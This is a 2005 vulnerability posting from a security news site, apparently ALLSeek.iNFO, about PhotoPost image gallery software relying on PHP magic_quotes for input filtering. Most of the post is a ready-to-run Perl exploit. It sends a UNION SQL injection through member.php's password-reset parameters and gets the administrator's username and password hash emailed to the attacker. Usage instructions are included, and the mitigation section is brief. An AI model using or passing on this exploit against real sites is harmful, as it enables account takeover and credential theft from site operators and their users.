Main Menu
Network
Sponsor
Top 10 Sites
Partners
|
|
Top Submit newsSubscribe 
Communication | Computer Crime | Digital Audio, Video, Photo | General News | Hardware | Internet | Mobile | PDA | Security | Software | Vulnerability |
Previous articleBack to news listNext article
| Sponsored links | Want to become one of our authors and see your work published on ALLSeek.iNFO ?
| | PhotoPost Arbitrary Data Exploit |
|---|
Categorie: Vulnerability
Posted: 2005-04-04 by basher13
Views: 701
| Current Rating: Not rated
|
| | Details |
|---|
Update:
23:40 04/04/05
Subject:
" PhotoPost Arbitrary Data Exploit "
Description:
PhotoPost is a popular commercial image publishing software.
Everyone loves showing off their photos! Add PhotoPost to your site,
or let us install it for you,and your visitors will be able to upload
their photos to galleries on your site and interact in photo
discussions. Join the 3,500+ sites that are already using
PhotoPost and add a fun new dimension to your website.
Vulnerbility:
PhotoPost (further on - PP) is built on a highly risky principle
of filtering input data, based on magic_quotes:
magic_quotes_gpc boolean
Sets the magic_quotes state for GPC (Get/Post/Cookie) operations.
When magic_quotes are on, all ' (single-quote), " (double quote), \ (backslash)
and NUL's are escaped with a backslash automatically.
Turning magic_quotes on is neglected by a large percentage of PP users.
It is a good idea not to rely on user interaction in the essential matter of
data filtering and write nested procedures based on on the mysql_escape_string/
mysql_real_escape_string functions instead. Adding a few native strings of code
would have definitely fixed that "human" factor.
Many users do not have any idea what magic_quotes is and
what it is for and what their negligence will lead them to, even despite a
warning PP gives while installing. If one were to
look into architecture PP is assembled upon, it would become clear
that PP should even not attempt to install itself on systems with
magic_quotes turned off.
Exploit:
#!/usr/bin/perl
use IO::Socket;
# PhotoPost Arbitrary Data Exploit
# --------------------------------
#
# Greats:Igor Franchuk (has discovered bug)
# Usage:
# phpost.pl [target_host] [path] [mail] [port]
# Exam:
# phpost.pl www.target.com photopost jhon@doe.com 80
use strict;
# Use first the exploit code,then You'll get admin MD5 hash and user name on your mail.
$banner = "PhotoPost Arbitrary data exploit\n\n";
# Info: 98.to/infamous
print "$banner\n";
print "\n-------------------------------\n";
print "\nINFGP-Hacking&Security Research\n";
print "\n\n";
if( !defined( $ARGV[ 0 ] && $ARGV[ 1 ] && $ARGV[ 2 ] && $ARGV[ 3 ] ))
{
&usage;
}
$port = @ARGV[3];
$host = @ARGV[0];
$path = @ARGV[1];
$mail = @ARGV[2];
$0day = 'member.php?ppaction=rpwd&verifykey=0&uid=0%20union%20select%20"0","$mail"
,%20concat(username,"%20",%20password)%20from%20users';
$inet = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => "tcp")
|| die "[-]Cannot connect to $host\n";
print "[+]Connected to host..";
print "[+]Sent 0day..";
print $inet "GET /@ARGV[1]/".$0day." HTTP/1.0\r\n\r\n";
print "[+]Target Exploited";
print "[+]You should check $mail now";
close($inet);
sub usage
{
die( "\n\nUsage: perl $0 [target] [path] [mail] [port]\n\n" );
}
Solution:
Vendor was contacted.Upgrade the version to lastest update.
set .htaccess php_value magic_quotes_gpc 1
Vendor URL:
http://www.photopost.com/
| | Syndication |
|---|
Permalink Email this
The URI to TrackBack this entry is:
http://allseek.info/news/trackback.php?id=1456
| | User comments (post your comments ) |
|---|
Only registerd members can post comments and articles
|
| Previous articleBack to news listNext article
|
|
|
|
InterJOB.su
|
